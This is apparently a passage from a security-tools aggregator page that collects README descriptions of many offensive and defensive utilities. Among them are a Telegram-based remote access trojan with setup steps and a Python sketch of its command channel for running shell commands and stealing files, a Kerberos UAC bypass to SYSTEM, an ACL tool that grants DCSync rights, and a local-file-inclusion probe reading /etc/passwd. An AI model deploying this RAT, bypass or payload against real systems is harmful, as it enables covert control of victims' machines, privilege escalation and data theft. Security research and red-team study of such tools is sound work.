Find Emails From Dorks By default, InfoHound has some dorks defined to discover emails. This task will look for them in the results obtained from dork execution.

Analysis

Name Description
Check Subdomains Take-Over It performs some checks to determine if a subdomain can be taken over.
Check If Domain Can Be Spoofed It checks if a domain, from the emails InfoHound has discovered, can be spoofed. This could be used by attackers to impersonate a person and send emails as him/her.
Get Profiles From Usernames This task uses the discovered usernames from each person to find profiles from services or social networks where that username exists. This is performed using the Maigret tool. It is worth noting that although a profile with the same username is found, it does not necessarily mean it belongs to the person being analyzed.
Download All Files Once files have been stored in the Files database table, this task will download them in the "download_files" folder.
Get Metadata Using exiftool, this task will extract all the metadata from the downloaded files and save it to the database.
Get Emails From Metadata As some metadata can contain emails, this task will retrieve all of them and save them to the database.
Get Emails From Files Content Usually, emails can be included in corporate files, so this task will retrieve all the emails from the downloaded files' content.
Find Registered Services using Emails It is possible to find services or social networks where an email has been used to create an account. This task will check if an email InfoHound has discovered has an account in Twitter, Adobe, Facebook, Imgur, Mewe, Parler, Rumble, Snapchat, Wordpress, and/or Duolingo.
Check Breach This task checks Firefox Monitor service to see if an email has been found in a data breach. Although it is a free service, it has a limitation of 10 queries per day. If Leak-Lookup API key is set, it also checks it.

Custom modules

InfoHound lets you create custom modules; you just need to add your script inside infohoudn/tool/custom_modules. One custom module has been added as an example, which uses the Holehe tool to check if the previously discovered emails are attached to accounts on sites like Twitter, Instagram, Imgur and more than 120 others.

Inspired by



Xcrawl3R - A CLI Utility To Recursively Crawl Webpages

By: Zion3R


xcrawl3r is a command-line interface (CLI) utility to recursively crawl webpages, i.e. systematically browse webpages' URLs and follow links to discover linked webpages' URLs.


Features

  • Recursively crawls webpages for URLs.
  • Parses URLs from files (.js, .json, .xml, .csv, .txt & .map).
  • Parses URLs from robots.txt.
  • Parses URLs from sitemaps.
  • Renders pages (including Single Page Applications such as Angular and React).
  • Cross-Platform (Windows, Linux & macOS)

Installation

Install release binaries (Without Go Installed)

Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

  • ...with wget:

     wget https://github.com/hueristiq/xcrawl3r/releases/download/v<version>/xcrawl3r-<version>-linux-amd64.tar.gz
  • ...or, with curl:

     curl -OL https://github.com/hueristiq/xcrawl3r/releases/download/v<version>/xcrawl3r-<version>-linux-amd64.tar.gz

...then, extract the binary:

tar xf xcrawl3r-<version>-linux-amd64.tar.gz

TIP: The above steps, download and extract, can be combined into a single step with this one-liner:

curl -sL https://github.com/hueristiq/xcrawl3r/releases/download/v<version>/xcrawl3r-<version>-linux-amd64.tar.gz | tar -xzv

NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xcrawl3r executable.

...move the xcrawl3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

sudo mv xcrawl3r /usr/local/bin/

NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xcrawl3r to their PATH.

Install source (With Go Installed)

Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.

go install ...

go install -v github.com/hueristiq/xcrawl3r/cmd/xcrawl3r@latest

go build ... the development Version

  • Clone the repository

     git clone https://github.com/hueristiq/xcrawl3r.git 
  • Build the utility

     cd xcrawl3r/cmd/xcrawl3r && \
    go build .
  • Move the xcrawl3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

     sudo mv xcrawl3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xcrawl3r to their PATH.

NOTE: While the development version is a good way to take a peek at xcrawl3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.

Usage

To display the help message for xcrawl3r, use the -h flag:

xcrawl3r -h

help message:

                             _ _____      
__ _____ _ __ __ ___ _| |___ / _ __
\ \/ / __| '__/ _` \ \ /\ / / | |_ \| '__|
> < (__| | | (_| |\ V V /| |___) | |
/_/\_\___|_| \__,_| \_/\_/ |_|____/|_| v0.1.0

A CLI utility to recursively crawl webpages.

USAGE:
xcrawl3r [OPTIONS]

INPUT:
-d, --domain string domain to match URLs
--include-subdomains bool match subdomains' URLs
-s, --seeds string seed URLs file (use `-` to get from stdin)
-u, --url string URL to crawl

CONFIGURATION:
--depth int maximum depth to crawl (default 3)
TIP: set it to `0` for infinite recursion
--headless bool If true the browser will be displayed while crawling.
-H, --headers string[] custom header to include in requests
e.g. -H 'Referer: http://example.com/'
TIP: use multiple flag to set multiple headers
--proxy string[] Proxy URL (e.g: http://127.0.0.1:8080)
TIP: use multiple flag to set multiple proxies
--render bool utilize a headless chrome instance to render pages
--timeout int time to wait for request in seconds (default: 10)
--user-agent string User Agent to use (default: web)
TIP: use `web` for a random web user-agent,
`mobile` for a random mobile user-agent,
or you can set your specific user-agent.

RATE LIMIT:
-c, --concurrency int number of concurrent fetchers to use (default 10)
--delay int delay between each request in seconds
--max-random-delay int maximum extra randomized delay added to `--delay` (default: 1s)
-p, --parallelism int number of concurrent URLs to process (default: 10)

OUTPUT:
--debug bool enable debug mode (default: false)
-m, --monochrome bool coloring: no colored output mode
-o, --output string output file to write found URLs
-v, --verbosity string debug, info, warning, error, fatal or silent (default: debug)

Contributing

Issues and Pull Requests are welcome! Check out the contribution guidelines.

Licensing

This utility is distributed under the MIT license.

Credits



Xurlfind3R - A CLI Utility To Find Domain'S Known URLs From Curated Passive Online Sources

By: Zion3R


xurlfind3r is a command-line interface (CLI) utility to find domain's known URLs from curated passive online sources.


Features

Installation

Install release binaries (Without Go Installed)

Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

  • ...with wget:

     wget https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz
  • ...or, with curl:

     curl -OL https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz

...then, extract the binary:

tar xf xurlfind3r-<version>-linux-amd64.tar.gz

TIP: The above steps, download and extract, can be combined into a single step with this one-liner:

curl -sL https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz | tar -xzv

NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xurlfind3r executable.

...move the xurlfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

sudo mv xurlfind3r /usr/local/bin/

NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xurlfind3r to their PATH.

Install source (With Go Installed)

Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.

go install ...

go install -v github.com/hueristiq/xurlfind3r/cmd/xurlfind3r@latest

go build ... the development Version

  • Clone the repository

     git clone https://github.com/hueristiq/xurlfind3r.git 
  • Build the utility

     cd xurlfind3r/cmd/xurlfind3r && \
    go build .
  • Move the xurlfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

     sudo mv xurlfind3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xurlfind3r to their PATH.

NOTE: While the development version is a good way to take a peek at xurlfind3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.

Post Installation

xurlfind3r will work right after installation. However, BeVigil, GitHub and Intelligence X require API keys to work; URLScan supports an API key but does not require one. The API keys are stored in the $HOME/.hueristiq/xurlfind3r/config.yaml file - created upon first run - which uses the YAML format. Multiple API keys can be specified for each of these sources, one of which will be used.

Example config.yaml:

version: 0.2.0
sources:
    - bevigil
    - commoncrawl
    - github
    - intelx
    - otx
    - urlscan
    - wayback
keys:
    bevigil:
        - awA5nvpKU3N8ygkZ
    github:
        - d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
        - asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39
    intelx:
        - 2.intelx.io:00000000-0000-0000-0000-000000000000
    urlscan:
        - d4c85d34-e425-446e-d4ab-f5a3412acbe8

Usage

To display the help message for xurlfind3r, use the -h flag:

xurlfind3r -h

help message:

                 _  __ _           _ _____      
__ ___ _ _ __| |/ _(_)_ __ __| |___ / _ __
\ \/ / | | | '__| | |_| | '_ \ / _` | |_ \| '__|
> <| |_| | | | | _| | | | | (_| |___) | |
/_/\_\\__,_|_| |_|_| |_|_| |_|\__,_|____/|_| v0.2.0

USAGE:
xurlfind3r [OPTIONS]

TARGET:
-d, --domain string (sub)domain to match URLs

SCOPE:
--include-subdomains bool match subdomain's URLs

SOURCES:
-s, --sources bool list sources
-u, --use-sources string sources to use (default: bevigil,commoncrawl,github,intelx,otx,urlscan,wayback)
--skip-wayback-robots bool with wayback, skip parsing robots.txt snapshots
--skip-wayback-source bool with wayback, skip parsing source code snapshots

FILTER & MATCH:
-f, --filter string regex to filter URLs
-m, --match string regex to match URLs

OUTPUT:
--no-color bool no color mode
-o, --output string output URLs file path
-v, --verbosity string debug, info, warning, error, fatal or silent (default: info)

CONFIGURATION:
-c, --configuration string configuration file path (default: ~/.hueristiq/xurlfind3r/config.yaml)

Examples

Basic

xurlfind3r -d hackerone.com --include-subdomains

Filter Regex

# filter images
xurlfind3r -d hackerone.com --include-subdomains -f '^https?://[^/]*?/.*\.(jpg|jpeg|png|gif|bmp)(\?[^\s]*)?$'

Match Regex

# match js URLs
xurlfind3r -d hackerone.com --include-subdomains -m '^https?://[^/]*?/.*\.js(\?[^\s]*)?$'

Contributing

Issues and Pull Requests are welcome! Check out the contribution guidelines.

Licensing

This utility is distributed under the MIT license.



KRBUACBypass - UAC Bypass By Abusing Kerberos Tickets

By: Zion3R


This POC is inspired by the "Taking Kerberos To The Next Level" topic James Forshaw (@tiraniddo) shared at BlackHat USA 2022, where he demonstrated abusing Kerberos tickets to achieve UAC bypass. By adding a KERB-AD-RESTRICTION-ENTRY to the service ticket but filling in a fake MachineID, we can easily bypass UAC and gain SYSTEM privileges by accessing the SCM to create a system service. James Forshaw explained the rationale behind this in a blog post called "Bypassing UAC in the most Complex Way Possible!", which got me very interested. Although he didn't provide the full exploit code, I built a POC based on Rubeus. As a C# toolset for raw Kerberos interaction and ticket abuse, Rubeus provides an easy interface that allows us to easily initiate Kerberos requests and manipulate Kerberos tickets.

You can see related articles about KRBUACBypass in my blog "Revisiting a UAC Bypass By Abusing Kerberos Tickets", including the background principle and how it is implemented. As said in the article, this article was inspired by @tiraniddo's "Taking Kerberos To The Next Level" (I would not have done it without his sharing) and I just implemented it as a tool before I graduated from college.


Tgtdeleg Trick

We cannot manually generate a TGT as we do not have access to the current user's credentials. However, Benjamin Delpy (@gentilkiwi) added a trick (tgtdeleg) to his Kekeo tool that allows you to abuse unconstrained delegation to obtain a local TGT with a session key.

Tgtdeleg abuses the Kerberos GSS-API to obtain available TGTs for the current user without obtaining elevated privileges on the host. This method uses the AcquireCredentialsHandle function to obtain the Kerberos security credentials handle for the current user, and calls the InitializeSecurityContext function for HOST/DC.domain.com using the ISC_REQ_DELEGATE flag and the target SPN to prepare the pseudo-delegation context to send to the domain controller. This causes the KRB_AP-REQ in the GSS-API output to include the KRB_CRED in the Authenticator Checksum. The service ticket's session key is then extracted from the local Kerberos cache and used to decrypt the KRB_CRED in the Authenticator to obtain a usable TGT. The Rubeus toolset also incorporates this technique. For details, please refer to “Rubeus – Now With More Kekeo”.

With this TGT, we can generate our own service ticket, and the feasible operation process is as follows:

  1. Use the Tgtdeleg trick to get the user's TGT.
  2. Use the TGT to request the KDC to generate a new service ticket for the local computer. Add a KERB-AD-RESTRICTION-ENTRY, but fill in a fake MachineID.
  3. Submit the service ticket into the cache.

Krbscm

Once you have a service ticket, you can use Kerberos authentication to access Service Control Manager (SCM) Named Pipes or TCP via the HOST/HOSTNAME or RPC/HOSTNAME SPN. Note that SCM's Win32 API always uses Negotiate authentication. James Forshaw created a simple POC, SCMUACBypass.cpp, which hooks the two APIs AcquireCredentialsHandle and InitializeSecurityContextW to change the name of the authentication package called by the SCM (pszPackage) to Kerberos, enabling the SCM to use Kerberos when authenticating locally.

Let’s see it in action

Now let's take a look at the running effect, as shown in the figure below. First request a ticket for the HOST service of the current server through the asktgs function, and then create a system service through krbscm to gain SYSTEM privileges.

KRBUACBypass.exe asktgs
KRBUACBypass.exe krbscm




TelegramRAT - Cross Platform Telegram Based RAT That Communicates Via Telegram To Evade Network Restrictions

By: Zion3R


Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions


Installation:

1. git clone https://github.com/machine1337/TelegramRAT.git
2. Now follow the instructions in the HOW TO USE section.

HOW TO USE:

1. Go to Telegram and search for https://t.me/BotFather
2. Create a bot and get the API_TOKEN
3. Now search for https://t.me/chatIDrobot and get the chat_id
4. Now go to client.py, lines 16 and 17, and place the API_TOKEN and chat_id there
5. Now run python client.py on Windows or python3 client.py on Linux
6. Now go to the bot you created and send commands in the message field (see the sketch below)
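
The whole channel is just Telegram's Bot API, which is why the traffic blends in with ordinary HTTPS to api.telegram.org. A minimal sketch of that exchange (not the repository's client.py; the token and chat id below are placeholders for the values from steps 2 and 3):

import requests

API_TOKEN = "123456:ABC-DEF"   # placeholder token from @BotFather
CHAT_ID = "123456789"          # placeholder chat id from @chatIDrobot
BASE = f"https://api.telegram.org/bot{API_TOKEN}"

# Send output back to the operator's chat
requests.post(f"{BASE}/sendMessage", data={"chat_id": CHAT_ID, "text": "client online"})

# Poll for new commands typed into the bot's message field
updates = requests.get(f"{BASE}/getUpdates", timeout=30).json()
for update in updates.get("result", []):
    print(update.get("message", {}).get("text"))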

HELP MENU:

HELP MENU: Coded By Machine1337
CMD Commands | Execute cmd commands directly in bot
cd .. | Move up one directory
cd foldername | Change to the specified folder
download filename | Download File From Target
screenshot | Capture Screenshot
info | Get System Info
location | Get Target Location

Features:

1. Execute shell commands in the bot directly.
2. Download files from the client.
3. Get client system information.
4. Get client location information.
5. Capture screenshots.
6. More features will be added.

Author:

Coded By: Machine1337
Contact: https://t.me/R0ot1337


LFI-FINDER - Tool Focuses On Detecting Local File Inclusion (LFI) Vulnerabilities

By: Zion3R

Written by TMRSWRR

Version 1.0.0

Instagram: TMRSWRR


How to use

LFI-FINDER is an open-source tool available on GitHub that focuses on detecting Local File Inclusion (LFI) vulnerabilities. Local File Inclusion is a common security vulnerability that allows an attacker to include files from a web server into the output of a web application. This tool automates the process of identifying LFI vulnerabilities by analyzing URLs and searching for specific patterns indicative of LFI. It can be a useful addition to a security professional's toolkit for detecting and addressing LFI vulnerabilities in web applications.

This tool works with geckodriver: it searches URLs for LFI vulnerabilities and, when it gets "root" text on the screen, it notifies you of the successful payload.
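
The core check is simple: load a candidate URL with an LFI payload in a real browser and look for tell-tale content such as the root entry of /etc/passwd. A minimal sketch of that idea (not LFI-FINDER's code), assuming Selenium with geckodriver and a hypothetical target parameter:

from selenium import webdriver

target = "http://testsite.local/index.php?page="   # hypothetical parameter to test
payload = "../../../../etc/passwd"                  # classic LFI probe

driver = webdriver.Firefox()                        # requires geckodriver on PATH
try:
    driver.get(target + payload)
    if "root:x:0:0:" in driver.page_source:         # the "root" text the tool looks for
        print(f"[+] Possible LFI with payload: {payload}")
finally:
    driver.quit()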

Installation

git clone https://github.com/capture0x/LFI-FINDER/
cd LFI-FINDER
bash setup.sh
pip3 install -r requirements.txt
chmod -R 755 lfi.py
python3 lfi.py

THIS IS FOR LATEST GOOGLE CHROME VERSION

Bugs and enhancements

For bug reports or enhancements, please open an issue here.

Copyright 2023



Wallet-Transaction-Monitor - This Script Monitors A Bitcoin Wallet Address And Notifies The User When There Are Changes In The Balance Or New Transactions

By: Zion3R


This script monitors a Bitcoin wallet address and notifies the user when there are changes in the balance or new transactions. It provides real-time updates on incoming and outgoing transactions, along with the corresponding amounts and timestamps. Additionally, it can play a sound notification on Windows when a new transaction occurs.

    Requirements

    • Python 3.x
    • requests library: you can install it by running pip install requests
    • winsound module: available by default on Windows

    How to Run

    • Make sure you have Python 3.x installed on your system.
    • pip install -r requirements.txt
    • Clone or download the script file wallet_transaction_monitor.py from this repository.
    • Place the sound file (in .wav format) you want to use for the notification in the same directory as the script. Make sure to replace "soundfile.wav" in the script with the actual filename of your sound file.
    • Open a terminal or command prompt and navigate to the directory where the script is located.
    • Run the script by executing the following command:
    python wallet_transaction_monitor.py

    The script will start monitoring the wallet and display updates whenever there are changes in the balance or new transactions. It will also play the specified sound notification on Windows.

    Important Notes

    This script is designed to work on Windows due to the use of the winsound module for sound notifications. If you are using a different operating system, you may need to modify the sound-related code or use an alternative method for audio notifications. The script uses the Blockchain.info API to fetch wallet data. Please ensure you have a stable internet connection for the script to work correctly. It's recommended to run the script in the background or keep the terminal window open while monitoring the wallet.
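
    A rough sketch of the polling idea (not the repository's script), assuming the Blockchain.info balance endpoint; the address and interval below are placeholders:

    import time
    import requests

    ADDRESS = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"   # placeholder wallet address
    previous_balance = None

    while True:
        # assumes the response shape {address: {"final_balance": ...}}
        data = requests.get(f"https://blockchain.info/balance?active={ADDRESS}", timeout=10).json()
        balance = data[ADDRESS]["final_balance"]     # balance in satoshis
        if previous_balance is not None and balance != previous_balance:
            print(f"Balance changed: {previous_balance} -> {balance} satoshis")
            # on Windows: winsound.PlaySound("soundfile.wav", winsound.SND_FILENAME)
        previous_balance = balance
        time.sleep(60)                               # poll once per minute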



    Sysreptor - Fully Customisable, Offensive Security Reporting Tool Designed For Pentesters, Red Teamers And Other Security-Related People Alike

    By: Zion3R


    Easy and customisable pentest report creator based on simple web technologies.

    SysReptor is a fully customisable, offensive security reporting tool designed for pentesters, red teamers and other security-related people alike. You can create designs based on simple HTML and CSS, write your reports in user-friendly Markdown and convert them to PDF with just a single click, in the cloud or on-premise!


    Your Benefits

    Write in markdown
    Design in HTML/VueJS
    Render your report to PDF
    Fully customizable
    Self-hosted or Cloud
    No need for Word

    SysReptor Cloud

    You just want to start reporting and save yourself all the effort of setting up, configuring and maintaining a dedicated server? Then SysReptor Cloud is the right choice for you! Get to know SysReptor on our Playground and if you like it, you can get your personal Cloud instance here:

    Sign up here


    SysReptor Self-Hosted

    You prefer self-hosting? That's fine! You will need:

    • Ubuntu
    • Latest Docker (with docker-compose-plugin)

    You can then install SysReptor via script:

    curl -s https://docs.sysreptor.com/install.sh | bash

    After successful installation, access your application at http://localhost:8000/.

    Get detailed installation instructions at Installation.





    ZeusCloud - Open Source Cloud Security

    By: Zion3R


    ZeusCloud is an open source cloud security platform.

    Discover, prioritize, and remediate your risks in the cloud.

    • Build an asset inventory of your AWS accounts.
    • Discover attack paths based on public exposure, IAM, vulnerabilities, and more.
    • Prioritize findings with graphical context.
    • Remediate findings with step by step instructions.
    • Customize security and compliance controls to fit your needs.
    • Meet compliance standards PCI DSS, CIS, SOC 2, and more!

    Quick Start

    1. Clone repo: git clone --recurse-submodules git@github.com:Zeus-Labs/ZeusCloud.git
    2. Run: cd ZeusCloud && make quick-deploy
    3. Visit http://localhost:80

    Check out our Get Started guide for more details.

    A cloud-hosted version is available on special request - email founders@zeuscloud.io to get access!

    Sandbox

    Play around with our sandbox environment to see how ZeusCloud identifies, prioritizes, and remediates risks in the cloud!

    Features

    • Discover Attack Paths - Discover toxic risk combinations an attacker can use to penetrate your environment.
    • Graphical Context - Understand context behind security findings with graphical visualizations.
    • Access Explorer - Visualize who has access to what with an IAM visualization engine.
    • Identify Misconfigurations - Discover the highest risk-of-exploit misconfigurations in your environments.
    • Configurability - Configure which security rules are active, which alerts should be muted, and more.
    • Security as Code - Modify rules or write your own with our extensible security as code approach.
    • Remediation - Follow step by step guides to remediate security findings.
    • Compliance - Ensure your cloud posture is compliant with PCI DSS, CIS benchmarks and more!

    Why ZeusCloud?

    Cloud usage continues to grow. Companies are shifting more of their workloads from on-prem to the cloud and both adding and expanding new and existing workloads in the cloud. Cloud providers keep increasing their offerings and their complexity. Companies are having trouble keeping track of their security risks as their cloud environment scales and grows more complex. Several high profile attacks have occurred in recent times. Capital One had an S3 bucket breached, Amazon had an unprotected Prime Video server breached, Microsoft had an Azure DevOps server breached, Puma was the victim of ransomware, etc.

    We had to take action.

    • We noticed traditional cloud security tools are opaque, confusing, time consuming to set up, and expensive as you scale your cloud environment
    • Cybersecurity vendors don't provide much actionable information to security, engineering, and devops teams by inundating them with non-contextual alerts
    • ZeusCloud is easy to set up, transparent, and configurable, so you can prioritize the most important risks
    • Best of all, you can use ZeusCloud for free!

    Future Roadmap

    • Integrations with vulnerability scanners
    • Integrations with secret scanners
    • Shift-left: Remediate risks earlier in the SDLC with context from your deployments
    • Support for Azure and GCP environments

    Contributing

    We love contributions of all sizes. What would be most helpful first:

    • Please give us feedback in our Slack.
    • Open a PR (see our instructions below on developing ZeusCloud locally)
    • Submit a feature request or bug report through Github Issues.

    Development

    Run containers in development mode:

    cd frontend && yarn && cd -
    docker-compose down && docker-compose -f docker-compose.dev.yaml --env-file .env.dev up --build

    Reset neo4j and/or postgres data with the following:

    rm -rf .compose/neo4j
    rm -rf .compose/postgres

    To develop on frontend, make the code changes and save.

    To develop on backend, run

    docker-compose -f docker-compose.dev.yaml --env-file .env.dev up --no-deps --build backend

    To access the UI, go to: http://localhost:80.

    Security

    Please do not run ZeusCloud exposed to the public internet. Use the latest versions of ZeusCloud to get all security related patches. Report any security vulnerabilities to founders@zeuscloud.io.

    Open-source vs. cloud-hosted

    This repo is freely available under the Apache 2.0 license.

    We're working on a cloud-hosted solution which handles deployment and infra management. Contact us at founders@zeuscloud.io for more information!

    Special thanks to the amazing Cartography project, which ZeusCloud uses for its asset inventory. Credit to PostHog and Airbyte for inspiration around public-facing materials - like this README!



    Acltoolkit - ACL Abuse Swiss-Knife

    By: Zion3R


    acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses.


    Installation

    pip install acltoolkit-ad

    or

    git clone https://github.com/zblurx/acltoolkit.git
    cd acltoolkit
    make

    Usage

    usage: acltoolkit [-h] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-dc-ip ip address] [-scheme ldap scheme]
    target {get-objectacl,set-objectowner,give-genericall,give-dcsync,add-groupmember,set-logonscript} ...

    ACL abuse swiss-army knife

    positional arguments:
    target [[domain/]username[:password]@]<target name or address>
    {get-objectacl,set-objectowner,give-genericall,give-dcsync,add-groupmember,set-logonscript}
    Action
    get-objectacl Get Object ACL
    set-objectowner Modify Object Owner
    give-genericall Grant an object GENERIC ALL on a targeted object
    give-dcsync Grant an object DCSync capabilities on the domain
    add-groupmember Add Member to Group
    set-logonscript Change Logon Script of User

    options:
    -h, --help show this help message and exit
    -debug Turn DEBUG output ON
    -no-pass don't ask for password (useful for -k)
    -k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the
    command line
    -dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
    -scheme ldap scheme

    authentication:
    -hashes LMHASH:NTHASH
    NTLM hashes, format is LMHASH:NTHASH

    Commands

    get-objectacl

    $ acltoolkit get-objectacl -h
    usage: acltoolkit target get-objectacl [-h] [-object object] [-all]

    options:
    -h, --help show this help message and exit
    -object object Dump ACL for <object>. Parameter can be a sAMAccountName, a name, a DN or an objectSid
    -all List every ACE of the object, even the less-interesting ones

    The get-objectacl command will take a sAMAccountName, a name, a DN or an objectSid as input with -object and will list its Sid, Name, DN, Class, adminCount, configured LogonScript, Primary Group, Owner and DACL. If no parameter is supplied, it will list information about the account used to authenticate.

    $ acltoolkit waza.local/jsmith:Password#123@192.168.56.112 get-objectacl
    Sid : S-1-5-21-267175082-2660600898-836655089-1103
    Name : waza\John Smith
    DN : CN=John Smith,CN=Users,DC=waza,DC=local
    Class : top, person, organizationalPerson, user
    adminCount : False

    Logon Script
    scriptPath : \\WAZZAAAAAA\OCD\test.bat
    msTSInitialProgram: \\WAZZAAAAAA\OCD\test.bat

    PrimaryGroup
    Sid : S-1-5-21-267175082-2660600898-836655089-513
    Name : waza\Domain Users
    DN : CN=Domain Users,OU=Builtin Groups,DC=waza,DC=local

    [...]

    OwnerGroup
    Sid : S-1-5-21-267175082-2660600898-836655089-512
    Name : waza\Domain Admins

    Dacl
    ObjectSid : S-1-1-0
    Name : Everyone
    AceType : ACCESS_ALLOWED_OBJECT_ACE
    AccessMask : 256
    ADRights : EXTENDED_RIGHTS
    IsInherited : False
    ObjectAceType : User-Change-Password

    [...]

    ObjectSid : S-1-5-32-544
    Name : BUILTIN\Administrator
    AceType : ACCESS_ALLOWED_ACE
    AccessMask : 983485
    ADRights : WRITE_OWNER, WRITE_DACL, GENERIC_READ, DELETE, EXTENDED_RIGHTS, WRITE_PROPERTY, SELF, CREATE_CHILD
    IsInherited : True

    set-objectowner

    $ acltoolkit set-objectowner -h
    usage: acltoolkit target set-objectowner [-h] -target-sid target_sid [-owner-sid owner_sid]

    options:
    -h, --help show this help message and exit
    -target-sid target_sid
    Object Sid targeted
    -owner-sid owner_sid New Owner Sid

    The set-objectowner will take as input a target sid and an owner sid, and will change the owner of the target object.

    give-genericall

    $ acltoolkit give-genericall -h
    usage: acltoolkit target give-genericall [-h] -target-sid target_sid [-granted-sid owner_sid]

    options:
    -h, --help show this help message and exit
    -target-sid target_sid
    Object Sid targeted
    -granted-sid owner_sid
    Object Sid granted GENERIC_ALL

    The give-genericall command takes as input a target sid and a granted sid, and grants the granted SID GENERIC_ALL on the target object.

    give-dcsync

    $ acltoolkit give-dcsync -h
    usage: acltoolkit target give-dcsync [-h] [-granted-sid owner_sid]

    options:
    -h, --help show this help message and exit
    -granted-sid owner_sid
    Object Sid granted DCSync capabilities

    The give-dcsync command takes as input a granted sid and grants DCSync capabilities to that SID.

    add-groupmember

    $ acltoolkit add-groupmember -h
    usage: acltoolkit target add-groupmember [-h] [-user user] -group group

    options:
    -h, --help show this help message and exit
    -user user User added to a group
    -group group Group where the user will be added

    The add-groupmember command takes as input a user sAMAccountName and a group sAMAccountName, and adds the user to the group.

    set-logonscript

    $ acltoolkit set-logonscript -h
    usage: acltoolkit target set-logonscript [-h] -target-sid target_sid -script-path script_path [-logonscript-type logonscript_type]

    options:
    -h, --help show this help message and exit
    -target-sid target_sid
    Object Sid of targeted user
    -script-path script_path
    Script path to set for the targeted user
    -logonscript-type logonscript_type
    Logon Script variable to change (default is scriptPath)

    The set-logonscript command takes as input a target sid and a script path, and sets the Logon Script path of the targeted user to the specified script path.



    SOC-Multitool - A Powerful And User-Friendly Browser Extension That Streamlines Investigations For Security Professionals

    By: Zion3R


    Introducing SOC Multi-tool, a free and open-source browser extension that makes investigations faster and more efficient. Now available on the Chrome Web Store and compatible with all Chromium-based browsers such as Microsoft Edge, Chrome, Brave, and Opera.
    Now available on Chrome Web Store!


    Streamline your investigations

    SOC Multi-tool eliminates the need for constant copying and pasting during investigations. Simply highlight the text you want to investigate, right-click, and navigate to the type of data highlighted. The extension will then open new tabs with the results of your investigation.

    Modern and feature-rich

    The SOC Multi-tool is a modernized multi-tool built from the ground up, with a range of features and capabilities. Some of the key features include:

    • IP Reputation Lookup using VirusTotal & AbuseIPDB
    • IP Info Lookup using Tor relay checker & WHOIS
    • Hash Reputation Lookup using VirusTotal
    • Domain Reputation Lookup using VirusTotal & AbuseIPDB
    • Domain Info Lookup using Alienvault
    • Living off the land binaries Lookup using the LOLBas project
    • Decoding of Base64 & HEX using CyberChef
    • File Extension & Filename Lookup using fileinfo.com & File.net
    • MAC Address manufacturer Lookup using maclookup.com
    • Parsing of UserAgent using user-agents.net
    • Microsoft Error code Lookup using Microsoft's DB
    • Event ID Lookup (Windows, Sharepoint, SQL Server, Exchange, and Sysmon) using ultimatewindowssecurity.com
    • Blockchain Address Lookup using blockchain.com
    • CVE Info using cve.mitre.org

    Easy to install

    You can easily install the extension by downloading the release from the Chrome Web Store!
    If you wish to make edits you can download from the releases page, extract the folder and make your changes.
    To load your edited extension turn on developer mode in your browser's extensions settings, click "Load unpacked" and select the extracted folder!


    SOC Multi-tool is a community-driven project and the developer encourages users to contribute and share better resources.



    Wanderer - An Open-Source Process Injection Enumeration Tool Written In C#

    By: Zion3R


    Wanderer is an open-source program that collects information about running processes. This information includes the integrity level, the presence of the AMSI as a loaded module, whether it is running as 64-bit or 32-bit as well as the privilege level of the current process. This information is extremely helpful when building payloads catered to the ideal candidate for process injection.

    This is a project that I started working on as I progressed through Offensive Security's PEN-300 course. One of my favorite modules from the course is the process injection & migration section, which inspired me to build a tool to help me be more efficient during that activity. A special thanks goes out to ShadowKhan, who provided valuable feedback that helped provide creative direction, making this utility visually appealing and enhancing its usability with suggested filtering capabilities.


    Usage

    PS C:\> .\wanderer.exe

    >> Process Injection Enumeration
    >> https://github.com/gh0x0st

    Usage: wanderer [target options] <value> [filter options] <value> [output options] <value>

    Target Options:

    -i, --id, Target a single or group of processes by their id number
    -n, --name, Target a single or group of processes by their name
    -c, --current, Target the current process and reveal the current privilege level
    -a, --all, Target every running process

    Filter Options:

    --include-denied, Include instances where process access is denied
    --exclude-32, Exclude instances where the process architecture is 32-bit
    --exclude-64, Exclude instances where the process architecture is 64-bit
    --exclude-amsiloaded, Exclude instances where amsi.dll is a loaded process module
    --exclude-amsiunloaded, Exclude instances where amsi is not a loaded process module
    --exclude-integrity, Exclude instances where the process integrity level is a specific value

    Output Options:

    --output-nested, Output the results in a nested style view
    -q, --quiet, Do not output the banner

    Examples:

    Enumerate the process with id 12345
    C:\> wanderer --id 12345

    Enumerate all processes with the names process1 and processs2
    C:\> wanderer --name process1,process2

    Enumerate the current process privilege level
    C:\> wanderer --current

    Enumerate all 32-bit processes
    C:\wanderer --all --exclude-64

    Enumerate all processes where AMSI is loaded
    C:\> wanderer --all --exclude-amsiunloaded

